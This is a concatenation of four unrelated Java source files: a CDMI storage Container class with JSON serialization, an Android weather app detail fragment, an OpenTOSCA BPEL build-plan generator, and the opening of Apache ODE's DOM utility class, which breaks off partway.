this.deserializevalue = deserializevalue;
}
public String getReference() {
return reference;
}
public void setReference(String reference) {
this.reference = reference;
}
public String getMove() {
return move;
}
public void setMove(String move) {
this.move = move;
}
public String getCopy() {
return copy;
}
public void setCopy(String copy) {
this.copy = copy;
}
public String getDeserialize() {
return deserialize;
}
public void setDeserialize(String deserialize) {
this.deserialize = deserialize;
}
/**
* Deserializes a container from the given JSON object.
*
* @param json a {@link JSONObject}
*/
public static Container fromJson(JSONObject json) {
Container container = new Container();
if (json.has("objectID")) {
container.setObjectId(json.optString("objectID"));
}
if (json.has("objectName")) {
container.objectName = json.optString("objectName");
}
if (json.has("parentURI")) {
container.parentUri = json.optString("parentURI");
}
if (json.has("parentID")) {
container.parentId = json.optString("parentID");
}
// default values
container.objectType = MediaTypes.CONTAINER;
container.domainUri = json.optString("domainURI", "/cdmi_domains");
container.capabilitiesUri = json.optString("capabilitiesURI", "/cdmi_capabilities/container");
container.completionStatus = json.optString("completionStatus", "Processing");
container.metadata = json.optJSONObject("metadata");
container.children = new JSONArray();
if (container.metadata == null) {
container.metadata = new JSONObject();
}
// optional values
if (json.has("percentComplete")) {
container.percentComplete = json.optString("percentComplete");
}
if (json.has("exports")) {
container.exports = json.optJSONObject("exports");
}
if (json.has("snapshots")) {
container.snapshots = json.optJSONArray("snapshots");
}
if (json.has("childrenrange")) {
container.childrenrange = json.optString("childrenrange");
}
if (json.has("children")) {
container.children = json.optJSONArray("children");
}
if (json.has("deserializevalue")) {
container.deserializevalue = json.optString("deserializevalue");
}
if (json.has("reference")) {
container.reference = json.optString("reference");
}
if (json.has("move")) {
container.move = json.optString("move");
}
if (json.has("copy")) {
container.copy = json.optString("copy");
}
if (json.has("deserialize")) {
container.deserialize = json.optString("deserialize");
}
return container;
}
@Override
public JSONObject toJson() {
JSONObject json = super.toJson();
json.putOpt("objectType", objectType);
json.putOpt("objectName", objectName);
json.putOpt("parentURI", parentUri);
json.putOpt("parentID", parentId);
json.putOpt("domainURI", domainUri);
json.putOpt("capabilitiesURI", capabilitiesUri);
json.putOpt("completionStatus", completionStatus);
json.putOpt("percentComplete", percentComplete);
json.putOpt("metadata", metadata);
json.putOpt("exports", exports);
json.putOpt("snapshots", snapshots);
json.putOpt("childrenrange", childrenrange);
json.putOpt("children", children);
json.putOpt("deserializevalue", deserializevalue);
json.putOpt("reference", reference);
json.putOpt("move", move);
json.putOpt("copy", copy);
json.putOpt("deserialize", deserialize);
return json;
}
@Override
public String toString() {
return "Container [objectId=" + getObjectId() + ", "
+ (objectType != null ? "objectType=" + objectType + ", " : "")
+ (objectName != null ? "objectName=" + objectName + ", " : "")
+ (parentUri != null ? "parentUri=" + parentUri + ", " : "")
+ (parentId != null ? "parentId=" + parentId + ", " : "")
+ (domainUri != null ? "domainUri=" + domainUri + ", " : "")
+ (capabilitiesUri != null ? "capabilitiesUri=" + capabilitiesUri + ", " : "")
+ (completionStatus != null ? "completionStatus=" + completionStatus + ", " : "")
+ (percentComplete != null ? "percentComplete=" + percentComplete + ", " : "")
+ (metadata != null ? "metadata=" + metadata + ", " : "")
+ (exports != null ? "exports=" + exports + ", " : "")
+ (snapshots != null ? "snapshots=" + snapshots + ", " : "")
+ (childrenrange != null ? "childrenrange=" + childrenrange + ", " : "")
+ (children != null ? "children=" + children + ", " : "")
+ (deserializevalue != null ? "deserializevalue=" + deserializevalue + ", " : "")
+ (reference != null ? "reference=" + reference + ", " : "")
+ (move != null ? "move=" + move + ", " : "") + (copy != null ? "copy=" + copy + ", " : "")
+ (deserialize != null ? "deserialize=" + deserialize : "") + "]";
}
}
|
|
package com.example.android.sunshine.app;
import android.content.Intent;
import android.database.Cursor;
import android.net.Uri;
import android.os.Bundle;
import android.support.v4.app.Fragment;
import android.support.v4.app.LoaderManager;
import android.support.v4.content.CursorLoader;
import android.support.v4.content.Loader;
import android.support.v4.view.MenuItemCompat;
import android.support.v7.widget.ShareActionProvider;
import android.view.LayoutInflater;
import android.view.Menu;
import android.view.MenuInflater;
import android.view.MenuItem;
import android.view.View;
import android.view.ViewGroup;
import android.widget.ImageView;
import android.widget.TextView;
import com.example.android.sunshine.app.data.WeatherContract;
import com.example.android.sunshine.app.data.WeatherContract.WeatherEntry;
/**
* A placeholder fragment containing a simple view.
*/
public class DetailFragment extends Fragment implements LoaderManager.LoaderCallbacks<Cursor> {
private static final String LOG_TAG = DetailFragment.class.getSimpleName();
private static final String FORECAST_SHARE_HASHTAG = " #SunshineApp";
public static final String DETAIL_URI = "URI";
private ShareActionProvider mShareActionProvider;
private String mForecast;
private Uri mUri;
private static final int DETAIL_LOADER = 0;
private static final String[] DETAIL_COLUMNS = {
WeatherEntry.TABLE_NAME + "." + WeatherEntry._ID,
WeatherEntry.COLUMN_DATE,
WeatherEntry.COLUMN_SHORT_DESC,
WeatherEntry.COLUMN_MAX_TEMP,
WeatherEntry.COLUMN_MIN_TEMP,
WeatherEntry.COLUMN_HUMIDITY,
WeatherEntry.COLUMN_PRESSURE,
WeatherEntry.COLUMN_WIND_SPEED,
WeatherEntry.COLUMN_DEGREES,
WeatherEntry.COLUMN_WEATHER_ID,
// This works because the WeatherProvider returns location data joined with
// weather data, even though they're stored in two different tables.
WeatherContract.LocationEntry.COLUMN_LOCATION_SETTING
};
// These indices are tied to DETAIL_COLUMNS. If DETAIL_COLUMNS changes, these
// must change.
public static final int COL_WEATHER_ID = 0;
public static final int COL_WEATHER_DATE = 1;
public static final int COL_WEATHER_DESC = 2;
public static final int COL_WEATHER_MAX_TEMP = 3;
public static final int COL_WEATHER_MIN_TEMP = 4;
public static final int COL_WEATHER_HUMIDITY = 5;
public static final int COL_WEATHER_PRESSURE = 6;
public static final int COL_WEATHER_WIND_SPEED = 7;
public static final int COL_WEATHER_DEGREES = 8;
public static final int COL_WEATHER_CONDITION_ID = 9;
private ImageView mIconView;
private TextView mFriendlyDateView;
private TextView mDateView;
private TextView mDescriptionView;
private TextView mHighTempView;
private TextView mLowTempView;
private TextView mHumidityView;
private TextView mWindView;
private TextView mPressureView;
public DetailFragment() {
setHasOptionsMenu(true);
}
@Override
public View onCreateView(LayoutInflater inflater, ViewGroup container,
Bundle savedInstanceState) {
Bundle args = getArguments();
if (args != null) {
mUri = args.getParcelable(DETAIL_URI);
}
View rootView = inflater.inflate(R.layout.fragment_detail, container, false);
mIconView = (ImageView) rootView.findViewById(R.id.detail_icon);
mDateView = (TextView) rootView.findViewById(R.id.detail_date_textview);
mFriendlyDateView = (TextView) rootView.findViewById(R.id.detail_day_textview);
mDescriptionView = (TextView) rootView.findViewById(R.id.detail_forecast_textview);
mHighTempView = (TextView) rootView.findViewById(R.id.detail_high_textview);
mLowTempView = (TextView) rootView.findViewById(R.id.detail_low_textview);
mHumidityView = (TextView) rootView.findViewById(R.id.detail_humidity_textview);
mWindView = (TextView) rootView.findViewById(R.id.detail_wind_textview);
mPressureView = (TextView) rootView.findViewById(R.id.detail_pressure_textview);
return rootView;
}
@Override
public void onCreateOptionsMenu(Menu menu, MenuInflater inflater) {
// Inflate the menu; this adds items to the action bar if it is present.
inflater.inflate(R.menu.detailfragment, menu);
// Retrieve the share menu item
MenuItem menuItem = menu.findItem(R.id.action_share);
// Get the provider and hold onto it to set/change the share intent.
mShareActionProvider = (ShareActionProvider) MenuItemCompat.getActionProvider(menuItem);
// If onLoadFinished happens before this, we can go ahead and set the share intent now.
if (mForecast != null) {
mShareActionProvider.setShareIntent(createShareForecastIntent());
}
}
private Intent createShareForecastIntent() {
Intent shareIntent = new Intent(Intent.ACTION_SEND);
shareIntent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_WHEN_TASK_RESET);
shareIntent.setType("text/plain");
shareIntent.putExtra(Intent.EXTRA_TEXT, mForecast + FORECAST_SHARE_HASHTAG);
return shareIntent;
}
@Override
public void onActivityCreated(Bundle savedInstanceState) {
getLoaderManager().initLoader(DETAIL_LOADER, null, this);
super.onActivityCreated(savedInstanceState);
}
@Override
public Loader<Cursor> onCreateLoader(int id, Bundle args) {
if (mUri != null) {
// Now create and return a CursorLoader that will take care of
// creating a Cursor for the data being displayed.
return new CursorLoader(
getActivity(),
mUri,
DETAIL_COLUMNS,
null,
null,
null
);
}
return null;
}
@Override
public void onLoadFinished(Loader<Cursor> loader, Cursor data) {
if (data != null && data.moveToFirst()) {
// Read weather condition ID from cursor
int weatherId = data.getInt(COL_WEATHER_CONDITION_ID);
int weatherImgResource = Utility.getArtResourceForWeatherCondition(weatherId);
// Use placeholder Image
mIconView.setImageResource(weatherImgResource);
// Read date from cursor and update views for day of week and date
long date = data.getLong(COL_WEATHER_DATE);
String friendlyDateText = Utility.getDayName(getActivity(), date);
String dateText = Utility.getFormattedMonthDay(getActivity(), date);
mFriendlyDateView.setText(friendlyDateText);
mDateView.setText(dateText);
// Read description from cursor and update view
String description = data.getString(COL_WEATHER_DESC);
mDescriptionView.setText(description);
double high = data.getDouble(COL_WEATHER_MAX_TEMP);
String highString = Utility.formatTemperature(getActivity(), high);
mHighTempView.setText(highString);
// Read low temperature from cursor and update view
double low = data.getDouble(COL_WEATHER_MIN_TEMP);
String lowString = Utility.formatTemperature(getActivity(), low);
mLowTempView.setText(lowString);
// Read humidity from cursor and update view
float humidity = data.getFloat(COL_WEATHER_HUMIDITY);
mHumidityView.setText(getActivity().getString(R.string.format_humidity, humidity));
// Read wind speed and direction from cursor and update view
float windSpeedStr = data.getFloat(COL_WEATHER_WIND_SPEED);
float windDirStr = data.getFloat(COL_WEATHER_DEGREES);
mWindView.setText(Utility.getFormattedWind(getActivity(), windSpeedStr, windDirStr));
// Read pressure from cursor and update view
float pressure = data.getFloat(COL_WEATHER_PRESSURE);
mPressureView.setText(getActivity().getString(R.string.format_pressure, pressure));
// We still need this for the share intent
mForecast = String.format("%s - %s - %s/%s", dateText, description, high, low);
// If onCreateOptionsMenu has already happened, we need to update the share intent now.
if (mShareActionProvider != null) {
mShareActionProvider.setShareIntent(createShareForecastIntent());
}
}
}
@Override
public void onLoaderReset(Loader<Cursor> loader) { }
public void onLocationChanged( String newLocation ) {
// replace the uri, since the location has changed
Uri uri = mUri;
if (null != uri) {
long date = WeatherContract.WeatherEntry.getDateFromUri(uri);
Uri updatedUri = WeatherContract.WeatherEntry.buildWeatherLocationWithDate(newLocation, date);
mUri = updatedUri;
getLoaderManager().restartLoader(DETAIL_LOADER, null, this);
}
}
}
|
|
package org.opentosca.planbuilder.core.bpel.typebasedplanbuilder;
import java.util.ArrayList;
import java.util.List;
import javax.xml.namespace.QName;
import javax.xml.parsers.ParserConfigurationException;
import org.eclipse.winery.model.tosca.TDefinitions;
import org.eclipse.winery.model.tosca.TNodeTemplate;
import org.eclipse.winery.model.tosca.TRelationshipTemplate;
import org.eclipse.winery.model.tosca.TServiceTemplate;
import org.opentosca.container.core.convention.Types;
import org.opentosca.container.core.model.ModelUtils;
import org.opentosca.container.core.model.csar.Csar;
import org.opentosca.planbuilder.core.AbstractBuildPlanBuilder;
import org.opentosca.planbuilder.core.ChoreographyBuilder;
import org.opentosca.planbuilder.core.bpel.artifactbasednodehandler.BPELScopeBuilder;
import org.opentosca.planbuilder.core.bpel.context.BPELPlanContext;
import org.opentosca.planbuilder.core.bpel.handlers.BPELFinalizer;
import org.opentosca.planbuilder.core.bpel.handlers.BPELPlanHandler;
import org.opentosca.planbuilder.core.bpel.handlers.CorrelationIDInitializer;
import org.opentosca.planbuilder.core.bpel.handlers.EmptyPropertyToInputHandler;
import org.opentosca.planbuilder.core.bpel.handlers.NodeRelationInstanceVariablesHandler;
import org.opentosca.planbuilder.core.bpel.handlers.PropertyVariableHandler;
import org.opentosca.planbuilder.core.bpel.handlers.ServiceTemplateBoundaryPropertyMappingsToOutputHandler;
import org.opentosca.planbuilder.core.bpel.handlers.SimplePlanBuilderServiceInstanceHandler;
import org.opentosca.planbuilder.core.bpel.handlers.SituationTriggerRegistration;
import org.opentosca.planbuilder.core.bpel.typebasednodehandler.BPELPluginHandler;
import org.opentosca.planbuilder.core.plugins.context.Property2VariableMapping;
import org.opentosca.planbuilder.core.plugins.registry.PluginRegistry;
import org.opentosca.planbuilder.core.plugins.typebased.IPlanBuilderPostPhasePlugin;
import org.opentosca.planbuilder.model.plan.AbstractPlan;
import org.opentosca.planbuilder.model.plan.bpel.BPELPlan;
import org.opentosca.planbuilder.model.plan.bpel.BPELScope;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import static org.opentosca.container.core.convention.PlanConstants.OpenTOSCA_BuildPlanOperation;
import static org.opentosca.container.core.convention.PlanConstants.OpenTOSCA_LifecycleInterface;
/**
* <p>
* This Class represents the high-level algorithm of the concept in <a href= "http://www2.informatik.uni-stuttgart.de/cgi-bin/NCSTRL/NCSTRL_view.pl?id=BCLR-0043&mod=0&engl=1&inst=FAK"
* >Konzept und Implementierung eine Java-Komponente zur Generierung von WS-BPEL 2.0 BuildPlans fuer OpenTOSCA</a>. It
* is responsible for generating the Build Plan Skeleton and assign plugins to handle the different templates inside a
* TopologyTemplate.
* </p>
* <p>
* Copyright 2013 IAAS University of Stuttgart <br>
* <br>
*
* @author Kalman Kepes - [email protected]
*/
public class BPELBuildProcessBuilder extends AbstractBuildPlanBuilder {
final static Logger LOG = LoggerFactory.getLogger(BPELBuildProcessBuilder.class);
// class for initializing properties inside the plan
private final PropertyVariableHandler propertyInitializer;
// class for initializing output with boundarydefinitions of a
// serviceTemplate
private final ServiceTemplateBoundaryPropertyMappingsToOutputHandler propertyOutputInitializer;
private final BPELScopeBuilder scopeBuilder;
// adds serviceInstance Variable and instanceDataAPIUrl to buildPlans
// class for finalizing build plans (e.g when some template didn't receive
// some provisioning logic and they must be filled with empty elements)
private final BPELFinalizer finalizer;
private final BPELPluginHandler bpelPluginHandler;
private final EmptyPropertyToInputHandler emptyPropInit;
private final ChoreographyBuilder choreoBuilder = new ChoreographyBuilder();
private final SimplePlanBuilderServiceInstanceHandler serviceInstanceInitializer;
private final CorrelationIDInitializer correlationHandler;
private final SituationTriggerRegistration sitRegistrationPlugin;
private final BPELPlanHandler planHandler;
private final NodeRelationInstanceVariablesHandler nodeRelationInstanceHandler;
/**
* <p>
* Default Constructor
* </p>
*/
public BPELBuildProcessBuilder(PluginRegistry pluginRegistry) {
super(pluginRegistry);
this.bpelPluginHandler = new BPELPluginHandler(pluginRegistry);
this.scopeBuilder = new BPELScopeBuilder(pluginRegistry);
this.emptyPropInit = new EmptyPropertyToInputHandler(scopeBuilder);
try {
this.planHandler = new BPELPlanHandler();
this.serviceInstanceInitializer = new SimplePlanBuilderServiceInstanceHandler();
this.nodeRelationInstanceHandler = new NodeRelationInstanceVariablesHandler(this.planHandler);
this.sitRegistrationPlugin = new SituationTriggerRegistration();
this.correlationHandler = new CorrelationIDInitializer();
} catch (final ParserConfigurationException e) {
LOG.error("Error while initializing BuildPlanHandler", e);
throw new PlanbuilderRuntimeException("Error while initializing BuildPlanHandler", e);
}
// TODO seems ugly
this.propertyInitializer = new PropertyVariableHandler(this.planHandler);
this.propertyOutputInitializer = new ServiceTemplateBoundaryPropertyMappingsToOutputHandler();
this.finalizer = new BPELFinalizer();
}
/*
* (non-Javadoc)
*
* @see org.opentosca.planbuilder.IPlanBuilder#buildPlan(java.lang.String,
* org.opentosca.planbuilder.model.tosca.TDefinitions, javax.xml.namespace.QName)
*/
private BPELPlan buildPlan(final Csar csar, final TDefinitions definitions,
final TServiceTemplate serviceTemplate) {
// create empty plan from servicetemplate and add definitions
String namespace;
if (serviceTemplate.getTargetNamespace() != null) {
namespace = serviceTemplate.getTargetNamespace();
} else {
namespace = definitions.getTargetNamespace();
}
QName serviceTemplateQname = new QName(serviceTemplate.getTargetNamespace(), serviceTemplate.getId());
if (namespace.equals(serviceTemplateQname.getNamespaceURI())
&& serviceTemplate.getId().equals(serviceTemplateQname.getLocalPart())) {
final String processName = ModelUtils.makeValidNCName(serviceTemplate.getId() + "_buildPlan");
final String processNamespace = serviceTemplate.getTargetNamespace() + "_buildPlan";
AbstractPlan buildPlan =
AbstractBuildPlanBuilder.generatePOG(new QName(processNamespace, processName).toString(), definitions, serviceTemplate, csar);
if (this.choreoBuilder.isChoreographyPartner(serviceTemplate)) {
LOG.debug("Transforming plan to be part of a choreography: ");
buildPlan = this.choreoBuilder.transformToChoreography(buildPlan, csar);
}
LOG.debug("Generated the following abstract prov plan: ");
LOG.debug(buildPlan.toString());
final BPELPlan newBuildPlan =
this.planHandler.createEmptyBPELPlan(processNamespace, processName, buildPlan, OpenTOSCA_BuildPlanOperation);
newBuildPlan.setTOSCAInterfaceName(OpenTOSCA_LifecycleInterface);
newBuildPlan.setTOSCAOperationname(OpenTOSCA_BuildPlanOperation);
this.planHandler.initializeBPELSkeleton(newBuildPlan, csar);
this.nodeRelationInstanceHandler.addInstanceURLVarToTemplatePlans(newBuildPlan, serviceTemplate);
this.nodeRelationInstanceHandler.addInstanceIDVarToTemplatePlans(newBuildPlan, serviceTemplate);
// newBuildPlan.setCsarName(csarName);
this.planHandler.registerExtension("http://www.apache.org/ode/bpel/extensions/bpel4restlight", true,
newBuildPlan);
final Property2VariableMapping propMap =
this.propertyInitializer.initializePropertiesAsVariables(newBuildPlan, serviceTemplate);
// init output
this.propertyOutputInitializer.initializeBuildPlanOutput(definitions, newBuildPlan, propMap,
serviceTemplate);
// instanceDataAPI handling is done solely trough this extension
// initialize instanceData handling
this.serviceInstanceInitializer.appendCreateServiceInstanceVarsAndAnitializeWithInstanceDataAPI(newBuildPlan);
String serviceInstanceUrl =
this.serviceInstanceInitializer.findServiceInstanceUrlVariableName(newBuildPlan);
String serviceInstanceID = this.serviceInstanceInitializer.findServiceInstanceIdVarName(newBuildPlan);
String serviceTemplateUrl =
this.serviceInstanceInitializer.findServiceTemplateUrlVariableName(newBuildPlan);
String planInstanceUrl = this.serviceInstanceInitializer.findPlanInstanceUrlVariableName(newBuildPlan);
this.emptyPropInit.initializeEmptyPropertiesAsInputParam(newBuildPlan, propMap, serviceInstanceUrl,
serviceInstanceID, serviceTemplateUrl, planInstanceUrl,
serviceTemplate, csar);
runPlugins(newBuildPlan, propMap, serviceInstanceUrl, serviceInstanceID, serviceTemplateUrl, planInstanceUrl, csar);
this.correlationHandler.addCorrellationID(newBuildPlan);
this.serviceInstanceInitializer.appendSetServiceInstanceState(newBuildPlan,
newBuildPlan.getBpelMainFlowElement(),
"CREATING", serviceInstanceUrl);
this.serviceInstanceInitializer.appendSetServiceInstanceState(newBuildPlan,
newBuildPlan.getBpelMainSequenceOutputAssignElement(),
"CREATED", serviceInstanceUrl);
this.serviceInstanceInitializer.appendSetServiceInstanceStateAsChild(newBuildPlan, this.planHandler.getMainCatchAllFaultHandlerSequenceElement(newBuildPlan), "ERROR", serviceInstanceUrl);
this.serviceInstanceInitializer.appendSetServiceInstanceStateAsChild(newBuildPlan, this.planHandler.getMainCatchAllFaultHandlerSequenceElement(newBuildPlan), "FAILED", this.serviceInstanceInitializer.findPlanInstanceUrlVariableName(newBuildPlan));
String planInstanceUrlVarName = this.serviceInstanceInitializer.findPlanInstanceUrlVariableName(newBuildPlan);
this.serviceInstanceInitializer.appendSetServiceInstanceState(newBuildPlan,
newBuildPlan.getBpelMainFlowElement(),
"RUNNING", planInstanceUrlVarName);
this.serviceInstanceInitializer.appendSetServiceInstanceState(newBuildPlan,
newBuildPlan.getBpelMainSequenceOutputAssignElement(),
"FINISHED", planInstanceUrlVarName);
this.sitRegistrationPlugin.handle(serviceTemplate, newBuildPlan);
this.finalizer.finalize(newBuildPlan);
return newBuildPlan;
}
LOG.warn("Couldn't create BuildPlan for ServiceTemplate {} in Definitions {} of CSAR {}",
serviceTemplateQname, definitions.getId(), csar.id().csarName());
return null;
}
/*
* (non-Javadoc)
*
* @see org.opentosca.planbuilder.IPlanBuilder#buildPlans(java.lang.String,
* org.opentosca.planbuilder.model.tosca.TDefinitions)
*/
@Override
public List<AbstractPlan> buildPlans(final Csar csar, final TDefinitions definitions) {
final List<AbstractPlan> plans = new ArrayList<>();
for (final TServiceTemplate serviceTemplate : definitions.getServiceTemplates()) {
if (ModelUtils.findServiceTemplateOperation(definitions,OpenTOSCA_LifecycleInterface, OpenTOSCA_BuildPlanOperation) == null) {
LOG.debug("ServiceTemplate {} has no BuildPlan, generating BuildPlan",
serviceTemplate.getId());
final BPELPlan newBuildPlan = buildPlan(csar, definitions, serviceTemplate);
if (newBuildPlan != null) {
LOG.debug("Created BuildPlan "
+ newBuildPlan.getBpelProcessElement().getAttribute("name"));
plans.add(newBuildPlan);
}
} else {
LOG.debug("ServiceTemplate {} has BuildPlan, no generation needed",
serviceTemplate.getId());
}
}
if (!plans.isEmpty()) {
LOG.info("Created {} build plans for CSAR {}", plans.size(), csar.id().csarName());
}
return plans;
}
/**
* <p>
* This method assigns plugins to the already initialized BuildPlan and its TemplateBuildPlans. First there will be
* checked if any generic plugin can handle a template of the TopologyTemplate
* </p>
*
* @param buildPlan a BuildPlan which is already initialized
* @param map a PropertyMap which contains mappings from Template to Property and to variable name of inside
* the BuildPlan
*/
private void runPlugins(final BPELPlan buildPlan, final Property2VariableMapping map,
final String serviceInstanceUrl, final String serviceInstanceID,
final String serviceTemplateUrl, final String planInstanceUrl, final Csar csar) {
for (final BPELScope bpelScope : buildPlan.getTemplateBuildPlans()) {
final BPELPlanContext context = new BPELPlanContext(scopeBuilder, buildPlan, bpelScope, map, buildPlan.getServiceTemplate(),
serviceInstanceUrl, serviceInstanceID, serviceTemplateUrl, planInstanceUrl, csar);
if (bpelScope.getNodeTemplate() != null) {
final TNodeTemplate nodeTemplate = bpelScope.getNodeTemplate();
// if this nodeTemplate has the label running (Property: State=Running), skip
// provisioning and just generate instance data handling
// extended check for OperatingSystem node type
if (isRunning(nodeTemplate)
|| ModelUtils.findNodeType(nodeTemplate, csar).getName().equals(Types.abstractOperatingSystemNodeType.getLocalPart())) {
LOG.debug("Skipping the provisioning of NodeTemplate "
+ bpelScope.getNodeTemplate().getId() + " because state=running is set.");
for (final IPlanBuilderPostPhasePlugin postPhasePlugin : this.pluginRegistry.getPostPlugins()) {
if (postPhasePlugin.canHandleCreate(context, bpelScope.getNodeTemplate())) {
postPhasePlugin.handleCreate(context, bpelScope.getNodeTemplate());
}
}
continue;
}
// generate code for the activity
this.bpelPluginHandler.handleActivity(context, bpelScope, nodeTemplate);
} else if (bpelScope.getRelationshipTemplate() != null) {
// handling relationshiptemplate
final TRelationshipTemplate relationshipTemplate = bpelScope.getRelationshipTemplate();
this.bpelPluginHandler.handleActivity(context, bpelScope, relationshipTemplate);
} else {
this.bpelPluginHandler.handleActivity(context, bpelScope);
}
}
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.ode.utils;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.Reader;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Iterator;
import java.util.LinkedList;
import java.util.List;
import java.util.Map;
import javax.xml.namespace.QName;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;
import javax.xml.transform.Source;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.dom.DOMResult;
import javax.xml.transform.dom.DOMSource;
import javax.xml.transform.sax.SAXSource;
import javax.xml.transform.stream.StreamSource;
import net.sf.saxon.om.Name11Checker;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.apache.ode.utils.sax.LoggingErrorHandler;
import org.apache.xerces.dom.DOMOutputImpl;
import org.apache.xerces.impl.Constants;
import org.apache.xml.serialize.DOMSerializerImpl;
import org.apache.xml.serialize.OutputFormat;
import org.apache.xml.serialize.XMLSerializer;
import org.w3c.dom.Attr;
import org.w3c.dom.CDATASection;
import org.w3c.dom.CharacterData;
import org.w3c.dom.Comment;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NamedNodeMap;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
import org.w3c.dom.ProcessingInstruction;
import org.w3c.dom.Text;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
/**
* Utility class for dealing with the Document Object Model (DOM).
*/
public class DOMUtils {
private static Logger __log = LoggerFactory.getLogger(DOMUtils.class);
/** The namespaceURI represented by the prefix <code>xmlns</code>. */
public static final String NS_URI_XMLNS = "http://www.w3.org/2000/xmlns/";
private static ThreadLocal<Transformer> __txers = new ThreadLocal();
private static ThreadLocal<DocumentBuilder> __builders = new ThreadLocal();
private static TransformerFactory _transformerFactory = TransformerFactory.newInstance();
private static DocumentBuilderFactory __documentBuilderFactory ;
static {
initDocumentBuilderFactory();
}
/**
* Initialize the document-builder factory.
*/
private static void initDocumentBuilderFactory() {
DocumentBuilderFactory f = XMLParserUtils.getDocumentBuilderFactory();
f.setNamespaceAware(true);
__documentBuilderFactory = f;
}
/**
* Returns the value of an attribute of an element. Returns null if the
* attribute is not found (whereas Element.getAttribute returns "" if an
* attrib is not found).
*
* @param el Element whose attrib is looked for
* @param attrName name of attribute to look for
*
* @return the attribute value
*/
static public String getAttribute(Element el, String attrName) {
String sRet = null;
Attr attr = el.getAttributeNode(attrName);
if (attr != null) {
sRet = attr.getValue();
}
return sRet;
}
/**
* @deprecated relies on XMLSerializer which is a deprecated Xerces class, use domToString instead
*/
static public String prettyPrint(Element e) throws IOException {
OutputFormat format = new OutputFormat(e.getOwnerDocument());
format.setLineWidth(65);
format.setIndenting(true);
format.setIndent(2);
StringWriter out = new StringWriter();
XMLSerializer serializer = new XMLSerializer(out, format);
serializer.serialize(e);
return out.toString();
}
public static Element getFirstChildElement(Node node) {
NodeList l = node.getChildNodes();
for (int i = 0; i < l.getLength(); i++) {
if (l.item(i) instanceof Element) return (Element) l.item(i);
}
return null;
}
/**
* Returns the value of an attribute of an element. Returns null if the
* attribute is not found (whereas Element.getAttributeNS returns "" if an
* attrib is not found).
*
* @param el Element whose attrib is looked for
* @param namespaceURI namespace URI of attribute to look for
* @param localPart local part of attribute to look for
*
* @return the attribute value
*/
static public String getAttributeNS(Element el, String namespaceURI,
String localPart) {
String sRet = null;
Attr attr = el.getAttributeNodeNS(namespaceURI, localPart);
if (attr != null) {
sRet = attr.getValue();
}
return sRet;
}
/**
* Concat all the text and cdata node children of this elem and return the
* resulting text.
*
* @param parentEl the element whose cdata/text node values are to be
* combined.
*
* @return the concatanated string.
*/
static public String getChildCharacterData(Element parentEl) {
if (parentEl == null) { return null; }
Node tempNode = parentEl.getFirstChild();
StringBuffer strBuf = new StringBuffer();
CharacterData charData;
while (tempNode != null) {
switch (tempNode.getNodeType()) {
case Node.TEXT_NODE:
case Node.CDATA_SECTION_NODE:
charData = (CharacterData) tempNode;
strBuf.append(charData.getData());
break;
}
tempNode = tempNode.getNextSibling();
}
return strBuf.toString();
}
/**
* DOCUMENTME
*
* @param el DOCUMENTME
* @param id DOCUMENTME
*
* @return DOCUMENTME
*/
public static Element getElementByID(Element el, String id) {
if (el == null) { return null; }
String thisId = el.getAttribute("id");
if (id.equals(thisId)) { return el; }
NodeList list = el.getChildNodes();
for (int i = 0; i < list.getLength(); i++) {
Node node = list.item(i);
if (node instanceof Element) {
Element ret = getElementByID((Element) node, id);
if (ret != null) { return ret; }
}
}
return null;
}
/**
* Return the first child element of the given element. Null if no children
* are found.
*
* @param elem Element whose child is to be returned
*
* @return the first child element.
*/
public static Element getFirstChildElement(Element elem) {
return (Element) findChildByType(elem, Node.ELEMENT_NODE);
}
/**
* Given a prefix and a node, return the namespace URI that the prefix has
* been associated with. This method is useful in resolving the namespace
* URI of attribute values which are being interpreted as QNames. If prefix
* is null, this method will return the default namespace.
*
* @param context the starting node (looks up recursively from here)
* @param prefix the prefix to find an xmlns:prefix=uri for
*
* @return the namespace URI or null if not found
*/
public static String getNamespaceURIFromPrefix(Node context, String prefix) {
short nodeType = context.getNodeType();
Node tempNode = null;
switch (nodeType) {
case Node.ATTRIBUTE_NODE: {
tempNode = ((Attr) context).getOwnerElement();
break;
}
case Node.ELEMENT_NODE: {
tempNode = context;
break;
}
default: {
tempNode = context.getParentNode();
break;
}
}
while ((tempNode != null) && (tempNode.getNodeType() == Node.ELEMENT_NODE)) {
Element tempEl = (Element) tempNode;
String namespaceURI = (prefix == null) ? getAttribute(tempEl, "xmlns")
: getAttributeNS(tempEl, NS_URI_XMLNS, prefix);
if (namespaceURI != null) {
return namespaceURI;
}
tempNode = tempEl.getParentNode();
}
return null;
}
/**
* Return the next sibling element of the given element. Null if no more
* sibling elements are found.
*
* @param elem Element whose sibling element is to be returned
*
* @return the next sibling element.
*/
public static Element getNextSiblingElement(Element elem) {
for (Node n = elem.getNextSibling(); n != null; n = n.getNextSibling()) {
if (n.getNodeType() == Node.ELEMENT_NODE) { return (Element) n; }
}
return null;
}
/**
* DOCUMENTME
*
* @param el DOCUMENTME
* @param attrName DOCUMENTME
*
* @return DOCUMENTME
*
* @throws IllegalArgumentException DOCUMENTME
*/
